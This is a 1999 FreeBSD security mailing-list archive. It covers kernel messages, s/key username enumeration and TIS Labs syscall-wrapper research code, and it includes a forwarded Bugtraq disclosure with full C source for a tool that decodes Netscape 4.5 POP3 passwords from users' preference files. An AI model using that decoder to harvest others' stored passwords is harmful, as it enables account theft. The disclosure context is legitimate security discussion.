Fax: (095) 399-1677 -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGPfreeware 5.5.3i for non-commercial use mQENAzbKjHEAAAEIAOzapWqeMyu/0FpocL+jioXd60rQBFFCZB1EdLpxMhcrRLh+ s7ORT8xOCxZRgMbsWG1WxGtuccg6aiMRpVEUZbKQUN6qg1Kzbq2Iory8IsSfvYus UT8KENtAi6AhCeH3EvA89PAq/ajSSuIUolZf9TtLjhCxa+c9m9XBihhEO5aR9e9V WCF/YZ/RgtZZ9Hy46A6mOqBGPCAsxOG+J3TAJgWBRh8+zlaihE8uszUTcpM6Cngp wfKfV+XMgau5UfLpKklBhS+mPzyrOXX4t+bFmNJ/jQ/C4T5253sFZyVCRa0eW9/O 0JgDejN8WTq1ZrEJF+zUA+bhw+VsunsE+EyCX1EABRG0NVNlcmd1ZWkgVi4gTWVs ZWtob3YgPHNtZWxla292QHZuaWlnYXptYWluLmdhenByb20ucnU+iQEVAwUQNsqM cbp7BPhMgl9RAQFtUAgA0LaVjI5Zof/XvpfvUmUfZKUT9IhRa5MBcXVoKcztVDHz LRQOk9A/IlQ3ToGGJUq2PsdJDOPjGJPuHliwqmKSaQ6VM3rb0rT1O6YDqn8/4031 pRFC042qZHWKfBQKSfrQf32Iw5vrBxT0Caf1kpBdW2s1x8+ppUcL0mdqJQpxtU3L +Pqlz7wBtjT+UlUgSSGC+UmDh8r2bz0PEZp+HD4INbU7w66nvkynhsASXX77KG2M K0TxgxALGCxkiffMNUZDObRR7ZWCGZxsUizSC/k3YVOMGDoveUouTTVilVThTPXP N+MA23iagwmZO4k42q/0GDY+CCNiiQl8V9L1Y0ae0w== =MVFG -----END PGP PUBLIC KEY BLOCK----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 8 10:27:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from puck.nether.net (puck.nether.net [204.42.254.5]) by hub.freebsd.org (Postfix) with ESMTP id 033FE14C4A for ; Thu, 8 Apr 1999 10:27:17 -0700 (PDT) (envelope-from jared@puck.nether.net) Received: (from jared@localhost) by puck.nether.net (8.9.3/8.7.3) id NAA12585; Thu, 8 Apr 1999 13:24:50 -0400 (envelope-from jared) Date: Thu, 8 Apr 1999 13:24:50 -0400 From: Jared Mauch To: "Serguei V. Melekhov" Cc: "freebsd-security@FreeBSD.ORG" Subject: Re: /Kernel Calcru Message-ID: <19990408132450.J11653@puck.nether.net> Mail-Followup-To: "Serguei V. Melekhov" , "freebsd-security@FreeBSD.ORG" References: <370C9EF1.AD0BDAB@vniigazmain.gazprom.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <370C9EF1.AD0BDAB@vniigazmain.gazprom.ru>; from Serguei V. Melekhov on Thu, Apr 08, 1999 at 04:20:01PM +0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It's a calculation of cpu time the process has used. Somewhere there was a math error, causing a negative time to appear. I get thousands of these on some of my servers: eg: calcru: negative time of -12177441 usec for pid 1420 (cucipop) etc.. I've not seen it be of any harm, but it may be somehow that i'm not aware of. On Thu, Apr 08, 1999 at 04:20:01PM +0400, Serguei V. Melekhov wrote: > Hello, > Sorry for the dumb question. Just don't know what does that mean? > Apr 8 09:09:09 mail /kernel: calcru: negative time: -478 usec > Anyway, Time plays no role here. Just this kernel calcru message?! > > Thanks in advance. -- Jared Mauch | pgp key available via finger from jared@puck.nether.net clue++; | http://puck.nether.net/~jared/ My statements are only mine. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 8 10:37:27 1999 Delivered-To: freebsd-security@freebsd.org Received: from pro.via-rs.com.br (pro.via-rs.com.br [200.248.240.235]) by hub.freebsd.org (Postfix) with ESMTP id 142D015B00 for ; Thu, 8 Apr 1999 10:37:10 -0700 (PDT) (envelope-from lauro@pro.via-rs.com.br) Received: from pro.via-rs.com.br (as20.sa05.procergs.com.br [200.248.231.20]) by pro.via-rs.com.br (8.9.1a/8.9.1) with ESMTP id OAA12099 for ; Thu, 8 Apr 1999 14:38:00 -0300 (EST) Message-ID: <370CE733.C1C578E3@pro.via-rs.com.br> Date: Thu, 08 Apr 1999 14:28:20 -0300 From: Lauro Barbosa X-Mailer: Mozilla 4.5 [en] (Win95; I) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: FreeBSD 2.2.8 and DES (again) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello Again! Please, I need help. I have a server with FreeBSD 2.2.8 and DES instaled. In this server the users can to login using login_name or login_name. (whit dot at end). for example: john or john. Anybody know this problem ? How can to correct this ? Sorry my poor english. Thanks, Lauro. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 8 12:22:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from vtopus.cs.vt.edu (vtopus.cs.vt.edu [128.173.40.24]) by hub.freebsd.org (Postfix) with ESMTP id 403AC14DC9 for ; Thu, 8 Apr 1999 12:22:50 -0700 (PDT) (envelope-from dhagan@vtopus.cs.vt.edu) Received: (from dhagan@localhost) by vtopus.cs.vt.edu (8.9.1a/8.9.1) id PAA18727 for FreeBsd-security@freebsd.org; Thu, 8 Apr 1999 15:20:44 -0400 (EDT) Date: Thu, 8 Apr 1999 15:20:42 -0400 (EDT) From: Daniel Hagan To: FreeBsd-security@freebsd.org Subject: Login & s/key brain damage? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On a FreeBSD-3.1-Release system, I've configured the following in /etc/skey.access ----->8----- permit group wheel internet (my network) (my netmask) # Force everyone to login with skey. deny ----->8----- This seems to work just as advertised, except for one thing: Logging in with an invalid username results in immediate error message while valid accounts proceed to the password prompt: ----->8----- %telnet localhost Trying 127.0.0.1... Connected to localhost.cs.vt.edu. Escape character is '^]'. FreeBSD/i386 (myhost.cs.vt.edu) (ttyp2) login: bozo Login incorrect login: root s/key 94 po93853 Password: ----->8----- It seems to me that a more correct behavior would be to always present a (possibly random) skey challenge, and only reject the login after they try a password. This current situation seems to present an easy way of id-ing userid's on a system that someone wants secure. Is this correct behavior, or should we think about modifying login(1)? Daniel -- Daniel Hagan Computer Systems Engineer dhagan@cs.vt.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 8 14:20:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from relay.gw.tislabs.com (relay.gw.tislabs.com [192.94.214.100]) by hub.freebsd.org (Postfix) with ESMTP id 9A88A14D73 for ; Thu, 8 Apr 1999 14:20:32 -0700 (PDT) (envelope-from feldman@tislabs.com) Received: by relay.gw.tislabs.com; id RAA26039; Thu, 8 Apr 1999 17:29:24 -0400 (EDT) Received: from clipper.gw.tislabs.com(10.33.1.2) by relay.gw.tislabs.com via smap (4.1) id xma026009; Thu, 8 Apr 99 17:28:57 -0400 Received: from clipper.gw.tislabs.com (localhost [127.0.0.1]) by clipper.gw.tislabs.com (8.9.1/8.9.1) with ESMTP id RAA13119; Thu, 8 Apr 1999 17:17:35 -0400 (EDT) Message-Id: <199904082117.RAA13119@clipper.gw.tislabs.com> To: freebsd-security@freebsd.org Cc: feldman@tislabs.com Subject: Generic Software Wrappers Date: Thu, 08 Apr 1999 17:17:35 -0400 From: Mark S Feldman Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Almost 8 months back, I responded to a message on this list and described a research project we were working on. My message is below. At the end of the message, I said I would send another message to this list when we made our source available. Well, the first release of our Generic Software Wrappers Tool Kit -- still very much a research prototype -- is available. It runs under FreeBSD 2.2.x, Solaris 2.6, and, as much as we have ported to date, under Windows NT 4.0. We're limited to FreeBSD 2.2.x because we don't currently have the resources to port to 3.x. Check out ftp://ftp.tislabs.com/pub/wrappers if you're interested. Mark ------- Forwarded Message To: Philippe Regnauld cc: freebsd-security@freebsd.org, badger@tis.com, feldman@tis.com, Robert Watson Subject: Re: Fwd: "Using capabilties aaginst shell code" (fwd) Date: Wed, 19 Aug 1998 11:14:17 -0400 From: Mark S Feldman Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Content-Type: text Content-Length: 7470 Philippe, Your message to the freebsd-security list was passed to me. I'm the project leader for the Generic Software Wrappers project at TIS Labs at Network Associates. In short, under DARPA contract F30602-96-C-0333, we have developed a Wrapper Definition Language (WDL) based on 'C' which makes it easy to identify system events of interest (e.g., named system calls, all system calls containing a path parameter, system calls available only to root), to intercept them, and to deny, augment, or transform those events. We have developed a prototype under FreeBSD, including a wrapper compiler which compiles WDL into 'C', a Wrapper Support Subsystem implemented as a Loadable Kernel Module, and various support programs. We are currently porting to Solaris and Windows NT. Our source is not currently organized for distribution, but, once it is, it will be made available for free for non-commercial use. > Is this any form of restriction that can be implemented > in *BSD systems ? I.e.: restricting system calls to > certain classes of daemons ? One of our simpler wrappers is the noadmin wrapper, which prevents a wrapped process, even one running as root, from executing certain administrative system calls:: /* * $Id: noadmin.wr,v 1.5 1998/04/20 19:05:08 ko Exp $ * * noadmin.wr * * A wrapper that denies certain administrative syscalls. */ #include "../../wr.include/bsd.ch" wrapper noadmin { bsd::op{mount || unmount || ptrace || quotactl || acct || swapon || mknod || adjtime || ktrace || reboot || settimeofday} pre { return WR_DENY | WR_BADPERM; }; } In the wrapper, bsd.ch contains a characterization of the system API. It starts with the 'C' prototype, and then adds additional attributes that make it possible to group system calls and to deal with their parameters. The wrapper runs in the bsd domain and looks for the named operations. It intercepts before the operation occurs (pre keyword), prevents it from executing, making it appear to be a permission denied-type error. > As mentioned in the example below, why should POPd be allowed > to exec() ? This seems like a very sane approach (of course, > it implies knowledge/auditing of the code). In addition to our wrappers, which specify what events to look for and how to handle them, we have activation criteria, which determine which wrappers wrap a process. Activation criteria are simple boolean expressions which can be based on the uid, gid, program name, etc. If the pop daemon were named popd, the following activation criteria would cause it to be wrapped by the noadmin wrapper: prog == popd ==> noadmin As for not knowing what system calls a process needs to get the job done, it could first be run under a wrapper like dbcallcount, which tracks all system calls made by wrapped processes and uses Wrapper Query Language (WQL) to store call counts in our fast, lightweight database which can be viewed using our GUI or CLI from user space: /* * $Id: dbcallcount.wr,v 1.7 1998/08/06 19:45:17 ko Exp $ * * dbcallcount.wr * * This wrapper keeps track of the number of times each syscall is * attempted. * * Use the "wrselect" program to view the tables created. * */ #include "../../wr.include/bsd.ch" #include "../../wr.include/libwr.h" wrapper dbcallcount { DBTABLE callcountTable { char(20) key name; int count; }; callcountTable callcount; wr_activate() { int i; /* create the table. */ i = wql { create table callcount; }; if (i < 0) wr_printf("Error creating table.\n"); } wr_duplicate() { /* create the table. */ wql { create table callcount; }; } wr_deactivate() { /* Drop the table. */ wql { drop table callcount; }; } /* Catch all syscalls */ bsd::op{*} pre { int retVal; /* If syscall in in the db, increment count. */ /* If not, add the syscall to the database. */ retVal = wql { update callcount set .count = .count + 1 where .name = $$; }; if (retVal <= 0) { wql { insert into callcount values ($$, 1); }; } }; } > > Then we could have certain untrusted (i.e.: running as > root) daemons launched in such an environment, on top > of being chroot()ed. ... Yup. And wrappers provide a mechanism to do that. Take a look at the following wrapper which creates a simple, if silly, synthetic environment: /* * $Id: dbsynthetic.wr,v 1.5 1998/08/19 15:30:08 feldman Exp $ * * This wrapper provides a synthetic environment, doing string * substitutions on path names. * */ #include "../../wr.include/bsd.ch" #include "../../wr.include/libwr.h" wrapper dbsynthetic { /* Null-terminated array of substition string pairs. Each target * entry, if found in a path, will be replaced by the replacement * entry. Regular expressions, as defined in WDL, can be used for * the targets. */ DBTABLE path_table { char(256) target; char(256) replacement; }; DBTABLE alert_table { char(256) path; char(256) fullname; int pid; int uid; }; path_table global pathnames; alert_table global alerts; wr_install() { DBROW::path_table row; wql { create table pathnames; create table alerts; insert into pathnames values ( "/etc/master.passwd", "/etc/passwd"), ( "/kernel", "/etc/motd"), ( "/lkm", "/tmp"), ( "/usr/games", "/usr/bin"), ( "/usr/tmp", "/tmp"), ( "/var/tmp", "/tmp") ; select into row from pathnames; }; } wr_uninstall() { wql { drop table pathnames; drop table alerts; }; } /* Intercept all syscalls containing paths before they run */ bsd::pattr{path} pre { DBROW::path_table row; string fullname; int changed = 0; /* Attempt to convert path from relative to absolute. If * the conversion doesn't succeed, it's a bad path. This * would normally be the end, but since we may be * redirecting from a non-existent path to one that exists, * we'll proceed */ if ((fullname = wr_abspath($path)) == NULL) { fullname = wr_strdup($path); } wql { select into row from pathnames; }; do { /* Do string substitutions for each pair of pathnames * and remember if any occurred. */ if (fullname =~ s|row.target|row.replacement|) changed++; } while (row.next()); /* Write out an alert to the database and change the path * parameter if any substitutions occurred. */ if (changed) { wql { insert into alerts values ($path, fullname, _pid, _uid); }; $path = fullname; } /* Cleanup */ wr_free(fullname); }; } My response is undoubtedly way too long. I'll make sure that a message is sent to this list when we make our source available. In the mean time, if you have any questions, let me know. Mark - ----- Mark S. Feldman TIS Labs at Network Associates, Inc. phone: +1 301 854 6889 3060 Washington Road fax: +1 301 854 5363 Glenwood, Maryland 21738 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message ------- End of Forwarded Message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 8 17:31: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from zerlargal.humbug.org.au (zerlargal.humbug.org.au [203.143.240.7]) by hub.freebsd.org (Postfix) with ESMTP id 01CB114E57 for ; Thu, 8 Apr 1999 17:30:56 -0700 (PDT) (envelope-from bc@thehub.com.au) Received: from localhost ([127.0.0.1] helo=zerlargal.humbug.org.au) by zerlargal.humbug.org.au with smtp (Exim 2.05 #3) id 10VP7o-0001pl-00; Fri, 9 Apr 1999 10:26:24 +1000 Date: Fri, 9 Apr 1999 10:26:24 +1000 (EST) From: Bruce Campbell X-Sender: bc@zerlargal.humbug.org.au To: Mark Newton Cc: Grant Beckerleg , freebsd-security@FreeBSD.ORG Subject: Re: ssh and scp In-Reply-To: <199904080936.TAA11475@atdot.dotat.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 8 Apr 1999, Mark Newton wrote: > Grant Beckerleg wrote: > > > I am very new to FreeBSD and I have been asked > > to investigate some security issues. I am not sure if this is FreeBSD > > specific or a general OS question so please bear with me. > > I use ssh to securely login to remote machines and I am looking into > > secure transfer of DNS database records between nameservers. > > Maybe I'm missing something, but isn't that what zone transfers > are for? Yes and no. Sure, if you've got a clear path between the two machines, zone transfers, using BIND 8* features to tell the other nominated nameservers when a change of a zone occurs, it works. If you operate a vaguely more secure network, or you are just paranoid about equipment failures, your master zone files are maintained behind a firewall, and then ssh (rsync specifically)'d out to your external nameserver. Works for me, although I'll admit to being a bit shy of null-password RSA keys, which can be alleviated somewhat by restricting which hosts can use which keys. --==-- Bruce. host -t txt rcs.203.in-addr.arpa To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 8 17:57:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from news.ks.edu.tw (news.ks.edu.tw [163.16.1.11]) by hub.freebsd.org (Postfix) with ESMTP id 0637F158CA for ; Thu, 8 Apr 1999 17:57:11 -0700 (PDT) (envelope-from foxfair@news.ks.edu.tw) Received: from foxfair (tnt-58.ks.edu.tw [163.16.5.117]) by news.ks.edu.tw (8.9.3/8.9.2) with SMTP id IAA72854 for ; Fri, 9 Apr 1999 08:45:13 +0800 (CST) (envelope-from foxfair@news.ks.edu.tw) Date: Fri, 09 Apr 1999 09:01:33 +0800 From: Foxfair Hu To: freebsd-security@freebsd.org Subject: Fw: Netscape 4.5 vulnerability Message-Id: <370D516D2EE.C14EFOXFAIR@news.ks.edu.tw> MIME-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit X-Mailer: Becky! ver 1.24 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Forwarded by Foxfair Hu ---------------- Original message follows ---------------- From: Alexey Pavlov To: BUGTRAQ@netspace.org Date: Thu, 8 Apr 1999 21:12:27 +0400 Subject: Netscape 4.5 vulnerability -- I found method how to get users passwords from Netscape 4.5 for FreeBSD ~user/.netscape/liprefs.js file. This file is used for storing user last session preferences .This file also contains encrypted password for pop3. Not like a DES , this encryption can be decrypted. As a result of many experiments i wrote this program. It gives me almost all passwords in my system, because all people use Netscape. Here is src of this decryption programm: -----------------BEGIN CUT HERE------------- /***************************************************** This Program designed for extract and decode Netshcape email password. This program is realy very go-o-o-od!! Programming by Lesha (c)1999 *****************************************************/ #include #include #include #include #include #include #include unsigned char Tbl_1[]={ 'A','B','C','D','E','F','G','H','I','J','K', 'L','M','N','O','P','Q','R','S','T','U','V', 'W','X','Y','Z','a','b','c','d','e','f','g', 'h','i','j','k','l','m','n','o','p','q','r', 's','t','u','v','w','x','y','z','0','1','2', '3','4','5','6','7','8','9','+','/','=' }; unsigned char Tbl_2[96][8]={ {0x76,0xe9,0xcf,0x6a,0xbb,0x9e,0x7a,0x62}, {0x77,0xe8,0xce,0x6b,0xba,0x9f,0x7b,0x63}, {0x74,0xeb,0xcd,0x68,0xb9,0x9c,0x78,0x60}, {0x75,0xea,0xcc,0x69,0xb8,0x9d,0x79,0x61}, {0x72,0xed,0xcb,0x6e,0xbf,0x9a,0x7e,0x66}, {0x73,0xec,0xca,0x6f,0xbe,0x9b,0x7f,0x67}, {0x70,0xef,0xc9,0x6c,0xbd,0x98,0x7c,0x64}, {0x71,0xee,0xc8,0x6d,0xbc,0x99,0x7d,0x65}, {0x7e,0xe1,0xc7,0x62,0xb3,0x96,0x72,0x6a}, {0x7f,0xe0,0xc6,0x63,0xb2,0x97,0x73,0x6b}, {0x7c,0xe3,0xc5,0x60,0xb1,0x94,0x70,0x68}, {0x7d,0xe2,0xc4,0x61,0xb0,0x95,0x71,0x69}, {0x7a,0xe5,0xc3,0x66,0xb7,0x92,0x76,0x6e}, {0x7b,0xe4,0xc2,0x67,0xb6,0x93,0x77,0x6f}, {0x78,0xe7,0xc1,0x64,0xb5,0x90,0x74,0x6c}, {0x79,0xe6,0xc0,0x65,0xb4,0x91,0x75,0x6d}, {0x66,0xf9,0xdf,0x7a,0xab,0x8e,0x6a,0x72}, {0x67,0xf8,0xde,0x7b,0xaa,0x8f,0x6b,0x73}, {0x64,0xfb,0xdd,0x78,0xa9,0x8c,0x68,0x70}, {0x65,0xfa,0xdc,0x79,0xa8,0x8d,0x69,0x71}, {0x62,0xfd,0xdb,0x7e,0xaf,0x8a,0x6e,0x76}, {0x63,0xfc,0xda,0x7f,0xae,0x8b,0x6f,0x77}, {0x60,0xff,0xd9,0x7c,0xad,0x88,0x6c,0x74}, {0x61,0xfe,0xd8,0x7d,0xac,0x89,0x6d,0x75}, {0x6e,0xf1,0xd7,0x72,0xa3,0x86,0x62,0x7a}, {0x6f,0xf0,0xd6,0x73,0xa2,0x87,0x63,0x7b}, {0x6c,0xf3,0xd5,0x70,0xa1,0x84,0x60,0x78}, {0x6d,0xf2,0xd4,0x71,0xa0,0x85,0x61,0x79}, {0x6a,0xf5,0xd3,0x76,0xa7,0x82,0x66,0x7e}, {0x6b,0xf4,0xd2,0x77,0xa6,0x83,0x67,0x7f}, {0x68,0xf7,0xd1,0x74,0xa5,0x80,0x64,0x7c}, {0x69,0xf6,0xd0,0x75,0xa4,0x81,0x65,0x7d}, {0x16,0x89,0xaf,0x0a,0xdb,0xfe,0x1a,0x02}, {0x17,0x88,0xae,0x0b,0xda,0xff,0x1b,0x03}, {0x14,0x8b,0xad,0x08,0xd9,0xfc,0x18,0x00}, {0x15,0x8a,0xac,0x09,0xd8,0xfd,0x19,0x01}, {0x12,0x8d,0xab,0x0e,0xdf,0xfa,0x1e,0x06}, {0x13,0x8c,0xaa,0x0f,0xde,0xfb,0x1f,0x07}, {0x10,0x8f,0xa9,0x0c,0xdd,0xf8,0x1c,0x04}, {0x11,0x8e,0xa8,0x0d,0xdc,0xf9,0x1d,0x05}, {0x1e,0x81,0xa7,0x02,0xd3,0xf6,0x12,0x0a}, {0x1f,0x80,0xa6,0x03,0xd2,0xf7,0x13,0x0b}, {0x1c,0x83,0xa5,0x00,0xd1,0xf4,0x10,0x08}, {0x1d,0x82,0xa4,0x01,0xd0,0xf5,0x11,0x09}, {0x1a,0x85,0xa3,0x06,0xd7,0xf2,0x16,0x0e}, {0x1b,0x84,0xa2,0x07,0xd6,0xf3,0x17,0x0f}, {0x18,0x87,0xa1,0x04,0xd5,0xf0,0x14,0x0c}, {0x19,0x86,0xa0,0x05,0xd4,0xf1,0x15,0x0d}, {0x06,0x99,0xbf,0x1a,0xcb,0xee,0x0a,0x12}, {0x07,0x98,0xbe,0x1b,0xca,0xef,0x0b,0x13}, {0x04,0x9b,0xbd,0x18,0xc9,0xec,0x08,0x10}, {0x05,0x9a,0xbc,0x19,0xc8,0xed,0x09,0x11}, {0x02,0x9d,0xbb,0x1e,0xcf,0xea,0x0e,0x16}, {0x03,0x9c,0xba,0x1f,0xce,0xeb,0x0f,0x17}, {0x00,0x9f,0xb9,0x1c,0xcd,0xe8,0x0c,0x14}, {0x01,0x9e,0xb8,0x1d,0xcc,0xe9,0x0d,0x15}, {0x0e,0x91,0xb7,0x12,0xc3,0xe6,0x02,0x1a}, {0x0f,0x90,0xb6,0x13,0xc2,0xe7,0x03,0x1b}, {0x0c,0x93,0xb5,0x10,0xc1,0xe4,0x00,0x18}, {0x0d,0x92,0xb4,0x11,0xc0,0xe5,0x01,0x19}, {0x0a,0x95,0xb3,0x16,0xc7,0xe2,0x06,0x1e}, {0x0b,0x94,0xb2,0x17,0xc6,0xe3,0x07,0x1f}, {0x08,0x97,0xb1,0x14,0xc5,0xe0,0x04,0x1c}, {0x09,0x96,0xb0,0x15,0xc4,0xe1,0x05,0x1d}, {0x36,0xa9,0x8f,0x2a,0xfb,0xde,0x3a,0x22}, {0x37,0xa8,0x8e,0x2b,0xfa,0xdf,0x3b,0x23}, {0x34,0xab,0x8d,0x28,0xf9,0xdc,0x38,0x20}, {0x35,0xaa,0x8c,0x29,0xf8,0xdd,0x39,0x21}, {0x32,0xad,0x8b,0x2e,0xff,0xda,0x3e,0x26}, {0x33,0xac,0x8a,0x2f,0xfe,0xdb,0x3f,0x27}, {0x30,0xaf,0x89,0x2c,0xfd,0xd8,0x3c,0x24}, {0x31,0xae,0x88,0x2d,0xfc,0xd9,0x3d,0x25}, {0x3e,0xa1,0x87,0x22,0xf3,0xd6,0x32,0x2a}, {0x3f,0xa0,0x86,0x23,0xf2,0xd7,0x33,0x2b}, {0x3c,0xa3,0x85,0x20,0xf1,0xd4,0x30,0x28}, {0x3d,0xa2,0x84,0x21,0xf0,0xd5,0x31,0x29}, {0x3a,0xa5,0x83,0x26,0xf7,0xd2,0x36,0x2e}, {0x3b,0xa4,0x82,0x27,0xf6,0xd3,0x37,0x2f}, {0x38,0xa7,0x81,0x24,0xf5,0xd0,0x34,0x2c}, {0x39,0xa6,0x80,0x25,0xf4,0xd1,0x35,0x2d}, {0x26,0xb9,0x9f,0x3a,0xeb,0xce,0x2a,0x32}, {0x27,0xb8,0x9e,0x3b,0xea,0xcf,0x2b,0x33}, {0x24,0xbb,0x9d,0x38,0xe9,0xcc,0x28,0x30}, {0x25,0xba,0x9c,0x39,0xe8,0xcd,0x29,0x31}, {0x22,0xbd,0x9b,0x3e,0xef,0xca,0x2e,0x36}, {0x23,0xbc,0x9a,0x3f,0xee,0xcb,0x2f,0x37}, {0x20,0xbf,0x99,0x3c,0xed,0xc8,0x2c,0x34}, {0x21,0xbe,0x98,0x3d,0xec,0xc9,0x2d,0x35}, {0x2e,0xb1,0x97,0x32,0xe3,0xc6,0x22,0x3a}, {0x2f,0xb0,0x96,0x33,0xe2,0xc7,0x23,0x3b}, {0x2c,0xb3,0x95,0x30,0xe1,0xc4,0x20,0x38}, {0x2d,0xb2,0x94,0x31,0xe0,0xc5,0x21,0x39}, {0x2a,0xb5,0x93,0x36,0xe7,0xc2,0x26,0x3e}, {0x2b,0xb4,0x92,0x37,0xe6,0xc3,0x27,0x3f}, {0x28,0xb7,0x91,0x34,0xe5,0xc0,0x24,0x3c} }; unsigned long int getn1(unsigned char c1){ register int i; if(c1=='='){return 0;} for(i=0;i<64;i++){if(Tbl_1[i]==c1){return i;}} return -1; } int ub64(unsigned char *in,unsigned char *out){ int i=0; int j=0; unsigned long int n; if(!in||!out){return 0;} while(in[i]){ n=(((getn1(in[i+0])&63)<<18)|((getn1(in[i+1])&63)<<12)|((getn1(in[i+2])&63)<<6)|(getn1(in[i+3])&63)); out[j+0]=(unsigned char)((n>>16)&255); out[j+1]=(unsigned char)((n>>8)&255); out[j+2]=(unsigned char)(n&255); i+=4;j+=3; } out[j]='\0'; return 0; } int decodestring(unsigned char *in,unsigned char *out){ int i; int j; int l; l=strlen(in);if(l>8){l=8;} if(!in||!out){return 0;} for(i=0;ipw_dir); strcat(filename,"/.netscape/liprefs.js"); } else if(strcmp(argv[1],"-f")==0){ strcpy(filename,argv[2]); } else{ printf("Unknown option %s\n",argv[1]); printf("%s",usage); exit(0); } /***************/ if((f=fopen(filename,"r"))==NULL){printf("Cannot open %s\n",filename);return 0;} while(!feof(f)){ fgets(buff,1024,f); if(strstr(buff,"user_pref")){ if(r=strstr(buff,"mail.pop_password")){ while(*r!='\"'){r++;}r++; while(*r!='\"'){r++;}r++; s=passwdbuff; while(*r!='\"'){*s=*r;s++;r++;} *s='\0'; } } } fclose(f); if(passwdbuff[0]=='\0'){printf("Password not found!\n");return 0;} ub64(passwdbuff,decoded1); decodestring(decoded1,decoded2); printf("%s\n",decoded2); } -----------------END CUT HERE--------------- Good luck, Lesha paaa@uic.nnov.ru gandalf@uic.nnov.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 8 18:11: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from pollux.or.signature.nl (pollux.or.signature.nl [194.229.138.194]) by hub.freebsd.org (Postfix) with ESMTP id DD35314E82 for ; Thu, 8 Apr 1999 18:10:27 -0700 (PDT) (envelope-from bit@signature.nl) Received: from localhost (bit@localhost) by pollux.or.signature.nl (8.9.1/8.9.1) with SMTP id DAA12249; Fri, 9 Apr 1999 03:07:16 +0200 (MET DST) Date: Fri, 9 Apr 1999 03:07:16 +0200 (MET DST) From: Bart Smit X-Sender: bit@pollux.or.signature.nl To: Foxfair Hu Cc: freebsd-security@FreeBSD.ORG Subject: Re: Fw: Netscape 4.5 vulnerability In-Reply-To: <370D516D2EE.C14EFOXFAIR@news.ks.edu.tw> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 9 Apr 1999, Foxfair Hu wrote: > session preferences .This file also contains encrypted password for > pop3. > Not like a DES , this encryption can be decrypted. As a result of many Sure it can. How else can Netscape reproduce your password? That some silly people choose to store their passwords in a file is hardly new and hardly a problem that belongs on this list. --Bart To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 8 18:35:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 3ADA214CD1 for ; Thu, 8 Apr 1999 18:35:43 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id SAA16835; Thu, 8 Apr 1999 18:33:06 -0700 (PDT) (envelope-from dillon) Date: Thu, 8 Apr 1999 18:33:06 -0700 (PDT) From: Matthew Dillon Message-Id: <199904090133.SAA16835@apollo.backplane.com> To: Foxfair Hu Cc: freebsd-security@FreeBSD.ORG Subject: Re: Fw: Netscape 4.5 vulnerability References: <370D516D2EE.C14EFOXFAIR@news.ks.edu.tw> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :Forwarded by Foxfair Hu :---------------- Original message follows ---------------- : From: Alexey Pavlov : To: BUGTRAQ@netspace.org : Date: Thu, 8 Apr 1999 21:12:27 +0400 : Subject: Netscape 4.5 vulnerability :-- : :I found method how to get users passwords from Netscape 4.5 for FreeBSD : ~user/.netscape/liprefs.js file. This file is used for storing user :last :session preferences .This file also contains encrypted password for :pop3. :Not like a DES , this encryption can be decrypted. As a result of many :experiments i wrote this program. It gives me almost all passwords in my : system, because all people use Netscape. :Here is src of this decryption programm: The 'security hole' is that netscape doesn't make the .netscape directory 700. I'd report it to netscape. I dunno whether they will do anything about it, though. -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 8 19:26:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id D32A4159F6 for ; Thu, 8 Apr 1999 19:26:11 -0700 (PDT) (envelope-from 